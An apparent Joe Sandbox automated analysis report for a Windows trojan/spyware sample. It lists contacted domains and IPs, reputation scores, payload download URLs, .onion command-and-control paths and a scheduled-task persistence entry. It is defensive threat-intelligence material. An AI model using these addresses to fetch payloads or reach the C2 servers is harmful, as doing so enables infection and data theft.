                      http://t.med0%VirustotalBrowse
                      http://vacantion18ffeu.cc/index.php0%Avira URL Cloudsafe
                      http://valarioulinity1.net/index.php1%VirustotalBrowse
                      https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt20%Avira URL Cloudsafe
                      http://schemas.datacontract.org/2004/07/System.Collections.GenericJ0%Avira URL Cloudsafe
                      http://goodfooggooftool.net/index.php0%Avira URL Cloudsafe
                      http://schemas.datacontract.org/2004/07/System.Collections.GenericJ0%VirustotalBrowse
                      https://drownthinsaltroutese.pw/api0%VirustotalBrowse
                      http://goodfooggooftool.net/index.php1%VirustotalBrowse
                      http://vacantion18ffeu.cc/index.php2%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      hugo.topteamlife.com
                      104.21.26.173
                      truetrueunknown
                      gxutc2c.com
                      109.175.29.39
                      truetrueunknown
                      ftpvoyager.cc
                      91.104.83.7
                      truetrueunknown
                      selebration17io.io
                      91.215.85.120
                      truetrueunknown
                      t.me
                      149.154.167.99
                      truefalse
                        high
                        ip-api.com
                        208.95.112.1
                        truefalse
                          high
                          drownthinsaltroutese.pw
                          172.67.131.114
                          truetrue
                            unknown
                            pastebin.com
                            104.20.68.143
                            truefalse
                              high
                              DNnWlzGnswsDCQNCmwABsgDqpMuf.DNnWlzGnswsDCQNCmwABsgDqpMuf
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                goddirtybrilliancece.funtrue
                                • Avira URL Cloud: safe
                                unknown
                                blastechohackopeower.pwtrue
                                • 5%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://5.42.66.0/288c47bbc187111b439df19ff4df68f076.exetrue
                                • 20%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://hugo.topteamlife.com/order/tuc5.exetrue
                                • 8%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://buriatiarutuhuob.net/index.phptrue
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                http://ftpvoyager.cc/ftp/index.phptrue
                                • 3%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                drownthinsaltroutese.pwtrue
                                • Avira URL Cloud: safe
                                unknown
                                http://cassiosssionunu.me/index.phptrue
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                http://selebration17io.io/index.phptrue
                                • 2%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://t.me/tor_proxiesfalse
                                  high
                                  https://drownthinsaltroutese.pw/apifalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://valarioulinity1.net/index.phptrue
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastebin.com/raw/z2fzAVz5false
                                    high
                                    http://ip-api.com/jsonfalse
                                      high
                                      http://vacantion18ffeu.cc/index.phptrue
                                      • 2%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://goodfooggooftool.net/index.phptrue
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1693195889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabInstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://t.me/tor_proxiesdInstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://drownthinsaltroutese.pw/apiq2InstallUtil.exe, 0000001A.00000002.2398138464.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1695312230.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000020.00000003.2293790669.0000021A306A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.2293790669.0000021A306E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.torproject.org/4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      high
                                                      https://excel.office.comexplorer.exe, 00000001.00000000.1697168851.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.autoitscript.com/autoit3/Kinds.8.drfalse
                                                          high
                                                          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=trueE35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, InstallUtil.exe, 0000002A.00000002.2767631716.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              https://curl.se/docs/hsts.htmlcsrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000020.00000003.2293790669.0000021A3071A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://t.me/mcfuture2DF.exe, 00000021.00000002.2472767778.0000000002E7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.datacontract.org/2004/07/EInvalidGlobalDataContractNamespace?DataContractNamespaceAlr9D1E.exe, 00000019.00000000.2171928326.0000000000FB2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://ip-api.comInstallUtil.exe, 0000002A.00000002.2865725310.00000000033A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1697168851.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://drownthinsaltroutese.pw/InstallUtil.exe, 0000001A.00000002.2398528056.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.2397253515.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.2398138464.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • 0%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 0000002A.00000002.2865725310.00000000033A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000020.00000003.2293790669.0000021A306C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://trac.torproject.org/projects/tor/ticket/14917.4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.innosetup.com/1600.exe, 00000028.00000003.2571412657.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, 1600.exe, 00000028.00000003.2570589683.0000000002350000.00000004.00001000.00020000.00000000.sdmp, 1600.tmp, 00000029.00000002.2986314650.0000000000401000.00000020.00000001.01000000.00000019.sdmp, 1600.exe, 0000002D.00000003.2599782173.0000000002350000.00000004.00001000.00020000.00000000.sdmp, 1600.exe, 0000002D.00000003.2615905945.0000000001F68000.00000004.00001000.00020000.00000000.sdmp, 1600.tmp.40.drfalse
                                                                                  • 2%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionInstallUtil.exe, 0000002A.00000002.2865725310.00000000035B7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                  • 4%, Virustotal, Browse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1697168851.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1697168851.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://word.office.comexplorer.exe, 00000001.00000000.1697168851.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re4577.exe, 00000018.00000002.2986069883.0000000000824000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000824000.00000040.00000400.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://steamcommunity.com/profiles/76561199592921038hello2DF.exe, 00000021.00000002.2472767778.0000000002E7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.ver)svchost.exe, 00000020.00000002.2992819838.0000021A2B0D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  low
                                                                                                  http://www.autoitscript.com/autoit3/XFar.pif, 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmp, Far.pif, 00000017.00000002.2987185085.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                    high
                                                                                                    http://pastebin.comdInstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://curl.se/docs/alt-svc.html4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.ecosia.org/newtab/InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://drownthinsaltroutese.pw/piInstallUtil.exe, 0000001A.00000002.2398138464.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1697168851.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/ef0e6c9136fd4b779a75726a3InstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000002A.00000002.2865725310.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000002A.00000002.2865725310.00000000033F7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    https://pastebin.com/raw/InstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://outlook.com_explorer.exe, 00000001.00000000.1697168851.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      low
                                                                                                                      http://pastebin.comInstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://t.medInstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://pastebin.comInstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://t.me/mcfuturehnymfsOpera/9.802DF.exe, 00000021.00000002.2472767778.0000000002E7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://web.telegram.orgInstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://drownthinsaltroutese.pw/akInstallUtil.exe, 0000001A.00000002.2398528056.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://cdn5.cdn-telegram.org/file/i4QQmSX-IWl_DPP440WbnzRvPCaYFxClaDPOTGTMNvRYQOqwUilTO2gWelNn07kDZInstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1697168851.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://drownthinsaltroutese.pw/HkInstallUtil.exe, 0000001A.00000002.2398528056.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://pastebin.com/raw/z2fzAVz5dInstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt24577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          low
                                                                                                                                          http://schemas.microexplorer.exe, 00000001.00000000.1694901150.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1694166846.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1696023227.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.openssl.org/support/faq.html4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.datacontract.org/2004/07/System.Collections.GenericJ9D1E.exe, 00000019.00000000.2171928326.0000000000FB2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000020.00000003.2293790669.0000021A306C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/09/enumerationsvchost.exe, 00000020.00000002.2992181174.0000021A2B0B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.torproject.org/documentation.htmlcsrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://api.msn.com/qexplorer.exe, 00000001.00000000.1695312230.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://t.meInstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                5.42.66.0
                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue
                                                                                                                                                                109.175.29.39
                                                                                                                                                                gxutc2c.comBosnia and Herzegowina
                                                                                                                                                                9146BIHNETBIHNETAutonomusSystemBAtrue
                                                                                                                                                                172.67.131.114
                                                                                                                                                                drownthinsaltroutese.pwUnited States
                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                192.36.38.33
                                                                                                                                                                unknownSweden
                                                                                                                                                                57169EDIS-AS-EUATfalse
                                                                                                                                                                149.154.167.99
                                                                                                                                                                t.meUnited Kingdom
                                                                                                                                                                62041TELEGRAMRUfalse
                                                                                                                                                                91.215.85.120
                                                                                                                                                                selebration17io.ioRussian Federation
                                                                                                                                                                34665PINDC-ASRUtrue
                                                                                                                                                                47.254.134.152
                                                                                                                                                                unknownUnited States
                                                                                                                                                                45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                208.95.112.1
                                                                                                                                                                ip-api.comUnited States
                                                                                                                                                                53334TUT-ASUSfalse
                                                                                                                                                                134.209.224.96
                                                                                                                                                                unknownUnited States
                                                                                                                                                                14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                195.66.87.105
                                                                                                                                                                unknownunknown
                                                                                                                                                                35196IHOR-ASRUfalse
                                                                                                                                                                104.20.68.143
                                                                                                                                                                pastebin.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                154.35.175.225
                                                                                                                                                                unknownUnited States
                                                                                                                                                                14987RETHEMHOSTINGUSfalse
                                                                                                                                                                185.220.101.23
                                                                                                                                                                unknownGermany
                                                                                                                                                                208294ASMKNLfalse
                                                                                                                                                                104.21.26.173
                                                                                                                                                                hugo.topteamlife.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                178.17.170.13
                                                                                                                                                                unknownMoldova Republic of
                                                                                                                                                                43289TRABIAMDfalse
                                                                                                                                                                91.104.83.7
                                                                                                                                                                ftpvoyager.ccHungary
                                                                                                                                                                8448PGSM-HUTorokbalintHungaryHUtrue
                                                                                                                                                                88.198.112.25
                                                                                                                                                                unknownGermany
                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                193.23.244.244
                                                                                                                                                                unknownGermany
                                                                                                                                                                50472CHAOS-ASDEfalse
                                                                                                                                                                78.46.174.72
                                                                                                                                                                unknownGermany
                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                IP
                                                                                                                                                                127.0.0.1
                                                                                                                                                                Joe Sandbox version:38.0.0 Ammolite
                                                                                                                                                                Analysis ID:1370880
                                                                                                                                                                Start date and time:2024-01-07 05:28:05 +01:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 12m 12s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                Number of analysed new started processes analysed:49
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:2
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Sample name:987123.exe
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@85/54@13/20
                                                                                                                                                                EGA Information:
                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 96%
                                                                                                                                                                • Number of executed functions: 181
                                                                                                                                                                • Number of non-executed functions: 212
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.42.65.92, 23.213.136.92, 23.57.64.93, 20.189.173.21, 104.208.16.94
                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, api.ipify.org, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                04:29:17Task SchedulerRun new task: Firefox Default Browser Agent 1260382C617BE296 path: C:\Users\user\AppData\Roaming\ufhjbuw
